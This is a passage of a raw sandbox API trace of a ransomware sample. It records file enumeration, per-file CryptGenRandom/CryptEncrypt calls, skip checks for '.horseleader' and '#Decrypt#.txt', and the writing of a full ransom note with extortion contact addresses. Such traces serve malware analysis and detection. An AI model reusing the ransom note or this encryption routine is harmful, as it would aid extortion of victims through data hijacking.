Shared\\ink\\TipBand.dll", lpSrch=".testttjffg") returned 0x0 [0234.289] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.289] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipBand.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipband.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.290] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d6a2945, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5d6a2945, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0234.290] lstrcmpiW (lpString1="TipRes.dll", lpString2="Windows") returned -1 [0234.290] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 65 [0234.290] StrStrIW (lpFirst="TipRes.dll", lpSrch=".horseleader") returned 0x0 [0234.290] lstrcmpW (lpString1="TipRes.dll", lpString2="#Decrypt#.txt") returned 1 [0234.290] lstrcmpW (lpString1="TipRes.dll", lpString2="_uninstalling_.png") returned 1 [0234.290] lstrlenW (lpString=".testttjffg") returned 11 [0234.290] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll", lpSrch=".testttjffg") returned 0x0 [0234.290] 
CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.290] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.290] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.290] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d7038f2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x3d7038f2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="tipresx.dll", cAlternateFileName="")) returned 1 [0234.290] lstrcmpiW (lpString1="tipresx.dll", lpString2="Windows") returned -1 [0234.290] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll") returned 66 [0234.290] StrStrIW (lpFirst="tipresx.dll", lpSrch=".horseleader") returned 0x0 [0234.290] lstrcmpW (lpString1="tipresx.dll", lpString2="#Decrypt#.txt") returned 1 [0234.290] lstrcmpW (lpString1="tipresx.dll", lpString2="_uninstalling_.png") returned 1 [0234.290] lstrlenW (lpString=".testttjffg") returned 11 [0234.290] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll", lpSrch=".testttjffg") returned 0x0 [0234.290] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: 
pbBuffer=0x32aed10) returned 1 [0234.290] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.291] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa125f634, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa125f634, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa1285794, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x130600, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="tipskins.dll", cAlternateFileName="")) returned 1 [0234.291] lstrcmpiW (lpString1="tipskins.dll", lpString2="Windows") returned -1 [0234.291] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll") returned 67 [0234.291] StrStrIW (lpFirst="tipskins.dll", lpSrch=".horseleader") returned 0x0 [0234.291] lstrcmpW (lpString1="tipskins.dll", lpString2="#Decrypt#.txt") returned 1 [0234.291] lstrcmpW (lpString1="tipskins.dll", lpString2="_uninstalling_.png") returned 1 [0234.291] lstrlenW (lpString=".testttjffg") returned 11 [0234.291] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll", lpSrch=".testttjffg") returned 0x0 [0234.291] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.291] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipskins.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.291] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1213373, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa1213373, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa12394d3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7ae00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="tiptsf.dll", cAlternateFileName="")) returned 1 [0234.291] lstrcmpiW (lpString1="tiptsf.dll", lpString2="Windows") returned -1 [0234.291] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll") returned 65 [0234.291] StrStrIW (lpFirst="tiptsf.dll", lpSrch=".horseleader") returned 0x0 [0234.291] lstrcmpW (lpString1="tiptsf.dll", lpString2="#Decrypt#.txt") returned 1 [0234.291] lstrcmpW (lpString1="tiptsf.dll", lpString2="_uninstalling_.png") returned 1 [0234.291] lstrlenW (lpString=".testttjffg") returned 11 [0234.291] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll", lpSrch=".testttjffg") returned 0x0 [0234.291] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.292] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, 
pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.292] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3dda83b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3dda83b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3dda83b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18c00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="tpcps.dll", cAlternateFileName="")) returned 1 [0234.292] lstrcmpiW (lpString1="tpcps.dll", lpString2="Windows") returned -1 [0234.292] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll") returned 64 [0234.292] StrStrIW (lpFirst="tpcps.dll", lpSrch=".horseleader") returned 0x0 [0234.292] lstrcmpW (lpString1="tpcps.dll", lpString2="#Decrypt#.txt") returned 1 [0234.292] lstrcmpW (lpString1="tpcps.dll", lpString2="_uninstalling_.png") returned 1 [0234.292] lstrlenW (lpString=".testttjffg") returned 11 [0234.292] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll", lpSrch=".testttjffg") returned 0x0 [0234.292] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.292] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, 
pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tpcps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tpcps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.292] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0234.292] lstrcmpiW (lpString1="tr-TR", lpString2="Windows") returned -1 [0234.292] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR") returned 60 [0234.292] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0234.292] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0234.292] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.292] GetProcessHeap () returned 0x780000 [0234.293] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.293] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*") returned 62 [0234.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.293] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.293] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\.") returned 62 [0234.293] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.293] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.293] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.293] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\..") returned 63 [0234.293] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.293] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.293] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6eb476, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a6eb476, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a6eb476, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, 
nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.293] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.293] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\tipresx.dll.mui") returned 76 [0234.293] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.294] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.294] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.294] lstrlenW (lpString=".testttjffg") returned 11 [0234.294] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.294] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.294] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.294] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6eb476, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a6eb476, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a6eb476, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, 
nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.294] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.294] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\#Decrypt#.txt") returned 74 [0234.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.295] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.295] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.296] lstrlenA (lpString="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") returned 1368 [0234.296] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.296] CloseHandle (hObject=0x158) returned 1 [0234.297] GetProcessHeap () returned 0x780000 [0234.297] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.297] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0234.297] lstrcmpiW (lpString1="uk-UA", lpString2="Windows") returned -1 [0234.297] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA") returned 60 [0234.297] lstrcmpW (lpString1="uk-UA", lpString2=".") returned 1 [0234.297] lstrcmpW (lpString1="uk-UA", lpString2="..") returned 1 [0234.297] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.297] GetProcessHeap () returned 0x780000 [0234.297] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0234.297] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*") returned 62 [0234.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.298] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.298] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\.") returned 62 [0234.298] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.298] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.298] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.298] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\..") returned 63 [0234.298] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.298] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0234.298] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe29f63af, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2c31822, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2c31822, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.298] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.298] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\tipresx.dll.mui") returned 76 [0234.298] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.298] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.298] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.299] lstrlenW (lpString=".testttjffg") returned 11 [0234.299] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.299] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.299] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.299] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe29f63af, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2c31822, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2c31822, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.299] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.299] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\#Decrypt#.txt") returned 74 [0234.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.300] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
